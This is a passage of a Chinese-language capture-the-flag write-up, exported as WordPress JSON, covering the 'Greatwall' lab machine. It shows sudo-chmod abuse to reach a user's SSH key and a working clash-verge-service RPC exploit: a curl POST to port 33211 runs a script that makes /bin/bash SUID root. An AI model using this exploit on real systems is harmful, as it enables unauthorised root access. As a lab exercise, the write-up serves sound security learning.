KEY-----\nwww-data@greatwall:\/home\/wall\/.ssh$ sudo -u wall \/bin\/chmod 600 id_rsa<\/code><\/pre>\n<p>\u8fdb\u884c\u4e86\u62a5\u9519\uff0c\u8bf4\u660e\u54b1\u4eec\u8fd9\u4e2a\u529e\u6cd5\u4e0d\u592a\u9614\u4ee5\uff1a<\/p>\n<pre><code class=\"language-bash\">\u2500\u2500(kali\u327fkali)-[~\/temp\/Greatwall]\n\u2514\u2500$ ssh wall@192.168.182.129 -i wall\nThe authenticity of host &#039;192.168.182.129 (192.168.182.129)&#039; can&#039;t be established.\nED25519 key fingerprint is SHA256:CJQF3wDS2rsdJ+TiNE7LaVsWzEUH2kK3rLthrBNtSqc.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added &#039;192.168.182.129&#039; (ED25519) to the list of known hosts.\nwall@192.168.182.129&#039;s password: \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Greatwall]\n\u2514\u2500$ ssh wall@192.168.182.129 -i wall -o &quot;StrictHostKeyChecking=no&quot;\nwall@192.168.182.129&#039;s password:<\/code><\/pre>\n<p>\u5c1d\u8bd5ssh\u8fde\u63a5\uff0c\u53d1\u73b0\u8fde\u63a5\u4e0d\u4e0a\uff0c\u5f00\u59cb\u53cd\u601d\u662f\u4e0d\u662f\u54ea\u91cc\u4e0d\u5bf9\uff0c\u5b9a\u4f4d\u5230\u4e86<code>.ssh<\/code>\u6587\u4ef6\u5939\u6743\u9650\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Greatwall]\n\u2514\u2500$ ls -la \/home\/kali\/ | grep ssh\ndrwx------  2 kali kali  4096 Jun 18 11:55 .ssh\n\nwww-data@greatwall:\/home\/wall$ sudo -u wall \/bin\/chmod 700 .ssh\n<\/code><\/pre>\n<p>\u7136\u540e\u5e94\u8be5\u5c31\u80fd\u8fde\u4e0a\u4e86\uff0c\u4f46\u662f\u8fd9\u91cc\u6211\u5728\u8fdb\u884c\u5c1d\u8bd5\u65f6\u65e0\u610f\u95f4\u5220\u9664\u4e86\u4fdd\u62a4\u6587\u4ef6<code>authorized_keys<\/code>\u5bfc\u81f4\u5fc5\u987b\u91cd\u65b0\u5bfc\u5165\u9776\u673a\u8fdb\u884c\u64cd\u4f5c\uff1a<\/p>\n<pre><code class=\"language-bash\">www-data@greatwall:\/$ cd \/home\nwww-data@greatwall:\/home$ ls -la\ntotal 12\ndrwxr-xr-x  3 root root 4096 May 10 18:54 .\ndrwxr-xr-x 18 root root 4096 May 10 18:53 ..\ndrwx------  4 wall wall 4096 May 11 02:41 wall\nwww-data@greatwall:\/home$ sudo -l\nMatching Defaults entries for www-data on greatwall:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser www-data may run the following commands on greatwall:\n    (wall) NOPASSWD: \/bin\/chmod\nwww-data@greatwall:\/home$ sudo -u wall \/bin\/chmod 777 wall\nwww-data@greatwall:\/home$ cd wall\nwww-data@greatwall:\/home\/wall$ ls -la\ntotal 32\ndrwxrwxrwx 4 wall wall 4096 May 11 02:41 .\ndrwxr-xr-x 3 root root 4096 May 10 18:54 ..\nlrwxrwxrwx 1 root root    9 May 11 00:15 .bash_history -&gt; \/dev\/null\n-rwx------ 1 wall wall  220 May 10 18:54 .bash_logout\n-rwx------ 1 wall wall 3526 May 10 18:54 .bashrc\ndrwx------ 3 wall wall 4096 May 11 00:18 .local\n-rwx------ 1 wall wall  807 May 10 18:54 .profile\ndrwxr-xr-x 2 wall wall 4096 May 11 02:41 .ssh\n-rwx------ 1 wall wall 1808 May 11 00:25 user.flag\nwww-data@greatwall:\/home\/wall$ cd .ssh\nwww-data@greatwall:\/home\/wall\/.ssh$ ls -la\ntotal 20\ndrwxr-xr-x 2 wall wall 4096 May 11 02:41 .\ndrwxrwxrwx 4 wall wall 4096 May 11 02:41 ..\n-rw-r--r-- 1 wall wall  568 May 11 02:41 authorized_keys\n-rw------- 1 wall wall 2602 May 11 02:41 id_rsa\n-rw-r--r-- 1 wall wall  568 May 11 02:41 id_rsa.pub\nwww-data@greatwall:\/home\/wall\/.ssh$ cd ..\nwww-data@greatwall:\/home\/wall$ sudo -u wall \/bin\/chmod 700 .ssh\nwww-data@greatwall:\/home\/wall$ ls -la\ntotal 32\ndrwxrwxrwx 4 wall wall 4096 May 11 02:41 .\ndrwxr-xr-x 3 root root 4096 May 10 18:54 ..\nlrwxrwxrwx 1 root root    9 May 11 00:15 .bash_history -&gt; \/dev\/null\n-rwx------ 1 wall wall  220 May 10 18:54 .bash_logout\n-rwx------ 1 wall wall 3526 May 10 18:54 .bashrc\ndrwx------ 3 wall wall 4096 May 11 00:18 .local\n-rwx------ 1 wall wall  807 May 10 18:54 .profile\ndrwx------ 2 wall wall 4096 May 11 02:41 .ssh\n-rwx------ 1 wall wall 1808 May 11 00:25 user.flag\nwww-data@greatwall:\/home\/wall$ sudo -u wall chmod 700 \/home\/wall\/\n<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103383.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103383.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619002347652\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6ce8\u610f\u4e00\u5b9a\u8981\u4fee\u6539 wall \u5bb6\u76ee\u5f55\u6743\u9650\uff01\uff01\uff01<\/p>\n<h3>clash\u65b0\u53d1\u6f0f\u6d1e\u63d0\u6743root<\/h3>\n<pre><code class=\"language-bash\">\u2500\u2500(kali\u327fkali)-[~\/temp\/Greatwall]\n\u2514\u2500$ ssh wall@192.168.182.129 -i wall\nLinux greatwall 6.1.0-32-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.129-1 (2025-03-06) x86_64\n\nLast login: Thu Jun 19 00:23:22 2025 from 192.168.182.128\nwall@greatwall:~$ sudo -l\nMatching Defaults entries for wall on greatwall:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser wall may run the following commands on greatwall:\n    (ALL) NOPASSWD: \/usr\/bin\/systemctl start clash-verge-service\nwall@greatwall:~$ whereis clash-verge-service\nclash-verge-service: \/usr\/bin\/clash-verge-service<\/code><\/pre>\n<p>\u8fd9\u4e2a\u6f0f\u6d1e\u6211\u770b\u5230\u8fc7\uff0c\u524d\u4e00\u9635\u5b50\u6709\u5fae\u4fe1\u5c0f\u7a0b\u5e8f\u53d1\u8fc7\u6587\u7ae0\uff0c\u5c1d\u8bd5\u6267\u884c\u5e76\u4e14\u641c\u7d22\u76f8\u5173\u6f0f\u6d1e\uff1a<\/p>\n<pre><code class=\"language-bash\">wall@greatwall:~$ sudo \/usr\/bin\/systemctl start clash-verge-service\nwall@greatwall:~$ sudo \/usr\/bin\/systemctl status clash-verge-service\n[sudo] password for wall: \nsudo: a password is required\nwall@greatwall:~$ ss -tulnp\nNetid               State                Recv-Q               Send-Q                             Local Address:Port                              Peer Address:Port               Process               \nudp                 UNCONN               0                    0                                        0.0.0.0:68                                     0.0.0.0:*                                        \ntcp                 LISTEN               0                    128                                      0.0.0.0:22                                     0.0.0.0:*                                        \ntcp                 LISTEN               0                    128                                    127.0.0.1:33211                                  0.0.0.0:*                                        \ntcp                 LISTEN               0                    128                                         [::]:22                                        [::]:*                                        \ntcp                 LISTEN               0                    511                                            *:80                                           *:* <\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103384.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103384.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619002740382\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u9614\u4ee5\u53c2\u8003\uff1a<\/p>\n<blockquote>\n<p><a href=\"https:\/\/zyen84kyvn.feishu.cn\/docx\/PXu6dsXf0onNdRxs8LfceNXjncb\">https:\/\/zyen84kyvn.feishu.cn\/docx\/PXu6dsXf0onNdRxs8LfceNXjncb<\/a><\/p>\n<p><a href=\"https:\/\/mp.weixin.qq.com\/s\/mRrwQKYsmr9KXUbu_jzDvQ\">https:\/\/mp.weixin.qq.com\/s\/mRrwQKYsmr9KXUbu_jzDvQ<\/a><\/p>\n<p><a href=\"https:\/\/mp.weixin.qq.com\/s\/K_0xp5m7NEhc7O3CGd1ldg\">https:\/\/mp.weixin.qq.com\/s\/K_0xp5m7NEhc7O3CGd1ldg<\/a><\/p>\n<\/blockquote>\n<p>\u6838\u5fc3\u51fa\u5728service\u670d\u52a1\uff0c\u672c\u5730\u4f1a\u76d1\u542c33211\u7aef\u53e3\uff0c\u652f\u6301\u901a\u8fc7HTTP RPC\u7684\u65b9\u5f0f\u4f20\u9012binpath\u53c2\u6570\u8fdb\u884c\u547d\u4ee4\u8c03\u7528\u3002<\/p>\n<p>\u7531\u4e8e\u9650\u5236\u4e86\u5f00\u653e\u7aef\u53e3\uff0c\u6545\u5c1d\u8bd5\u5728\u9776\u673a\u672c\u5730\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n<pre><code class=\"language-bash\">wall@greatwall:\/tmp$ echo &#039;#!\/bin\/bash&#039; &gt; exp.sh\nwall@greatwall:\/tmp$ echo &#039;chmod +s \/bin\/bash&#039; &gt;&gt; exp.sh\nwall@greatwall:\/tmp$ chmod +x exp.sh\nwall@greatwall:\/tmp$ ls -la \/bin\/bash\n-rwxr-xr-x 1 root root 1265648 Mar 30  2024 \/bin\/bash\nwall@greatwall:\/tmp$ curl -s -I -X POST &#039;http:\/\/127.0.0.1:33211\/start_clash&#039; -H &quot;Host: 127.0.0.1:33211&quot; -H &quot;Content-Type: application\/json&quot; -d &#039;{&quot;core_type&quot;:&quot;verge-mihome&quot;,&quot;bin_path&quot;:&quot;\/tmp\/exp.sh&quot;,&quot;config_dir&quot;:&quot;&quot;,&quot;config_file&quot;:&quot;\/tmp\/exp.sh&quot;,&quot;log_file&quot;:&quot;\/tmp\/clash.log&quot;}&#039;\nwall@greatwall:\/tmp$ ls -la \/bin\/bash\n-rwxr-xr-x 1 root root 1265648 Mar 30  2024 \/bin\/bash<\/code><\/pre>\n<p>\u5931\u8d25\u4e86\uff0c\u53ef\u80fd\u662f\u6784\u9020\u8bf7\u6c42\u9519\u8bef\u4e86\u3002\u3002\u3002\u4f7f\u7528\u5de5\u5177\u76f4\u63a5\u751f\u6210\u8bf7\u6c42\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103385.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103385.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619005158205\" style=\"zoom:33%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">curl -X POST -H &#039;Content-Type: application\/json&#039; -d &#039;{\n&quot;core_type&quot;:&quot;verge-mihome&quot;,\n&quot;bin_path&quot;:&quot;\/tmp\/exp.sh&quot;,\n&quot;config_dir&quot;:&quot;1&quot;,\n&quot;config_file&quot;:&quot;\/tmp\/exp.sh&quot;,\n&quot;log_file&quot;:&quot;\/tmp\/clash.log&quot;\n}&#039; &#039;https:\/\/127.0.0.1:33211\/start_clash&#039;\n# curl: (35) OpenSSL\/3.0.15: error:0A00010B:SSL routines::wrong version number<\/code><\/pre>\n<p>\u8fd9\u662f\u7531\u4e8e\u65e0\u610f\u95f4\u5199\u6210\u4e86<code>https<\/code>\u3002\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">wall@greatwall:\/tmp$ curl -X POST -H &#039;Content-Type: application\/json&#039; -d &#039;{\n&quot;core_type&quot;:&quot;verge-mihome&quot;,\n&quot;bin_path&quot;:&quot;\/tmp\/exp.sh&quot;,\n&quot;config_dir&quot;:&quot;1&quot;,\n&quot;config_file&quot;:&quot;\/tmp\/exp.sh&quot;,\n&quot;log_file&quot;:&quot;\/tmp\/clash.log&quot;\n}&#039; &#039;http:\/\/127.0.0.1:33211\/start_clash&#039;\n{&quot;code&quot;:0,&quot;msg&quot;:&quot;ok&quot;,&quot;data&quot;:null}\nwall@greatwall:\/tmp$ ls -la \/bin\/bash\n-rwsr-sr-x 1 root root 1265648 Mar 30  2024 \/bin\/bash\nwall@greatwall:\/tmp$ cat clash.log \nSpawning process: \/tmp\/exp.sh -d 1 -f \/tmp\/exp.sh<\/code><\/pre>\n<p>\u8fd9\u610f\u5473\u7740\u4e0a\u9762\u7684curl\u547d\u4ee4\u53ef\u4ee5\u8fdb\u884c\u9002\u5f53\u4fee\u6539\uff0c\u4e5f\u80fd\u5b8c\u7f8e\u751f\u6548\u4e86\uff0c\u4e0b\u9762\u9614\u4ee5\u63d0\u6743\u4e86\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103386.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103386.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619005657000\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103387.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506190103387.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619005723134\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53ef\u7231\u634f\u3002\u3002\u3002\u3002\u3002<\/p>\n<h2>\u4e00\u4e9b\u9690\u85cf\u4fe1\u606f\u7684\u641c\u96c6<\/h2>\n<p>\u5173\u4e8e\u7981\u6b62\u6d41\u91cf\u51fa\u7ad9\u7684\u76f8\u5173\u914d\u7f6e\uff0c\u8fdb\u884c\u67e5\u627e\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">bash-5.2# iptables -L\nbash: iptables: command not found\nbash-5.2# cat \/etc\/iptables\/*\n# Generated by iptables-save v1.8.9 (nf_tables) on Sun May 11 02:22:38 2025\n*filter\n:INPUT DROP [1:48]\n:FORWARD DROP [0:0]\n:OUTPUT DROP [4:176]\n-A INPUT -i lo -j ACCEPT\n-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT\n-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT\n-A INPUT -p tcp -m tcp --dport 80 -j ACCEPT\n-A OUTPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT\n-A OUTPUT -o lo -j ACCEPT\n-A OUTPUT -p tcp -m tcp --dport 22 -j ACCEPT\n-A OUTPUT -p tcp -m tcp --dport 80 -j ACCEPT\nCOMMIT\n# Completed on Sun May 11 02:22:38 2025<\/code><\/pre>\n<p>\u9650\u5236\u4e86\u51fa\u6218\u8fdb\u7ad9\u6d41\u91cf\u3002\u3002\u3002\u3002\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Greatwall \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Greatwall] \u2514 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-891","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/891","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=891"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/891\/revisions"}],"predecessor-version":[{"id":892,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/891\/revisions\/892"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=891"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=891"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=891"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}